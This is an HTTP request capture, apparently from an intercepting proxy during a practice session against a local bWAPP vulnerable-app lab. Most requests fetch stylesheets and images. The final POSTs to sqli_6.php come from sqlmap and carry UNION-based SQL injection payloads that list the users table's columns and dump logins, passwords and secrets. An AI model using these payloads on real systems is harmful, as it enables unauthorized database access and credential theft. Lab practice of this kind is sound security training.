GET /index.css HTTP/1.1
Host: 192.168.118.128
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: text/css,*/*;q=0.1
Referer: http://192.168.118.128/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close


========
GET /images/owasp.png HTTP/1.1
Host: 192.168.118.128
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://192.168.118.128/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close


========
GET /images/mandiant.png HTTP/1.1
Host: 192.168.118.128
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://192.168.118.128/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close


========
GET /images/Knob_Attention.png HTTP/1.1
Host: 192.168.118.128
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://192.168.118.128/index.css
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close


========
GET /images/Knob_Add.png HTTP/1.1
Host: 192.168.118.128
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://192.168.118.128/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close


========
GET /favicon.ico HTTP/1.1
Host: 192.168.118.128
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://192.168.118.128/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close


========
GET /bWAPP/stylesheets/stylesheet.css HTTP/1.1
Host: 192.168.118.128
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: text/css,*/*;q=0.1
Referer: http://192.168.118.128/bWAPP/login.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=themeh0bk0qum7jsjp8n2f6cp4; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada
Connection: close


========
GET /bWAPP/images/blogger.png HTTP/1.1
Host: 192.168.118.128
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://192.168.118.128/bWAPP/login.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=themeh0bk0qum7jsjp8n2f6cp4; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada
Connection: close


========
GET /bWAPP/images/linkedin.png HTTP/1.1
Host: 192.168.118.128
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://192.168.118.128/bWAPP/login.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=themeh0bk0qum7jsjp8n2f6cp4; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada
Connection: close


========
GET /bWAPP/images/twitter.png HTTP/1.1
Host: 192.168.118.128
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://192.168.118.128/bWAPP/login.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=themeh0bk0qum7jsjp8n2f6cp4; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada
Connection: close


========
GET /bWAPP/images/facebook.png HTTP/1.1
Host: 192.168.118.128
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://192.168.118.128/bWAPP/login.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=themeh0bk0qum7jsjp8n2f6cp4; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada
Connection: close


========
GET /bWAPP/images/bee_1.png HTTP/1.1
Host: 192.168.118.128
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://192.168.118.128/bWAPP/login.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=themeh0bk0qum7jsjp8n2f6cp4; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada
Connection: close


========
GET /css?family=Architects+Daughter HTTP/1.1
Host: fonts.googleapis.com
Sec-Ch-Ua: "Chromium";v="105", "Not)A;Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Sec-Ch-Ua-Platform: "Linux"
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: http://192.168.118.128/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close


========
GET /bWAPP/images/bg_3.jpg HTTP/1.1
Host: 192.168.118.128
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://192.168.118.128/bWAPP/stylesheets/stylesheet.css
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=themeh0bk0qum7jsjp8n2f6cp4; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada
Connection: close


========
GET /bWAPP/images/bg_1.jpg HTTP/1.1
Host: 192.168.118.128
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://192.168.118.128/bWAPP/stylesheets/stylesheet.css
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=themeh0bk0qum7jsjp8n2f6cp4; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada
Connection: close


========
GET /bWAPP/images/bg_2.jpg HTTP/1.1
Host: 192.168.118.128
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://192.168.118.128/bWAPP/stylesheets/stylesheet.css
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=themeh0bk0qum7jsjp8n2f6cp4; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada
Connection: close


========
GET /bWAPP/images/sb_1.jpg HTTP/1.1
Host: 192.168.118.128
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://192.168.118.128/bWAPP/stylesheets/stylesheet.css
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=themeh0bk0qum7jsjp8n2f6cp4; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada
Connection: close


========
GET /bWAPP/images/favicon.ico HTTP/1.1
Host: 192.168.118.128
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://192.168.118.128/bWAPP/login.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=themeh0bk0qum7jsjp8n2f6cp4; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada
Connection: close


========
GET /bWAPP/images/owasp.png HTTP/1.1
Host: 192.168.118.128
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://192.168.118.128/bWAPP/portal.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada; PHPSESSID=cuv2ai2014608aotcnf5959l25; security_level=0
Connection: close


========
GET /bWAPP/images/zap.png HTTP/1.1
Host: 192.168.118.128
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://192.168.118.128/bWAPP/portal.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada; PHPSESSID=cuv2ai2014608aotcnf5959l25; security_level=0
Connection: close


========
GET /bWAPP/images/mk.png HTTP/1.1
Host: 192.168.118.128
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://192.168.118.128/bWAPP/portal.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada; PHPSESSID=cuv2ai2014608aotcnf5959l25; security_level=0
Connection: close


========
GET /bWAPP/images/netsparker.png HTTP/1.1
Host: 192.168.118.128
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://192.168.118.128/bWAPP/portal.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada; PHPSESSID=cuv2ai2014608aotcnf5959l25; security_level=0
Connection: close


========
POST /bWAPP/sqli_6.php HTTP/1.1
Content-Length: 7
Cache-Control: no-cache
Cookie: PHPSESSID=cuv2ai2014608aotcnf5959l25;security_level=0
User-Agent: sqlmap/1.6.8.2#dev (https://sqlmap.org)
Host: 192.168.118.128
Accept: */*
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Connection: close

title=a
========
POST /bWAPP/sqli_6.php HTTP/1.1
Content-Length: 310
Cache-Control: no-cache
Cookie: PHPSESSID=cuv2ai2014608aotcnf5959l25;security_level=0
User-Agent: sqlmap/1.6.8.2#dev (https://sqlmap.org)
Host: 192.168.118.128
Accept: */*
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Connection: close

title=a%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CCONCAT%280x7170766b71%2CJSON_ARRAYAGG%28CONCAT_WS%280x6c6674707672%2Ccolumn_name%2Ccolumn_type%29%29%2C0x716b716b71%29%2CNULL%2CNULL%2CNULL%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D0x7573657273%20AND%20table_schema%3D0x6277617070%23
========
POST /bWAPP/sqli_6.php HTTP/1.1
Content-Length: 287
Cache-Control: no-cache
Cookie: PHPSESSID=cuv2ai2014608aotcnf5959l25;security_level=0
User-Agent: sqlmap/1.6.8.2#dev (https://sqlmap.org)
Host: 192.168.118.128
Accept: */*
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Connection: close

title=a%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CCONCAT%280x7170766b71%2CJSON_ARRAYAGG%28CONCAT_WS%280x6c6674707672%2Cactivated%2Cactivation_code%2Cadmin%2Cemail%2Cid%2Clogin%2Cpassword%2Creset_code%2Csecret%29%29%2C0x716b716b71%29%2CNULL%2CNULL%2CNULL%20FROM%20bwapp.users%23
========
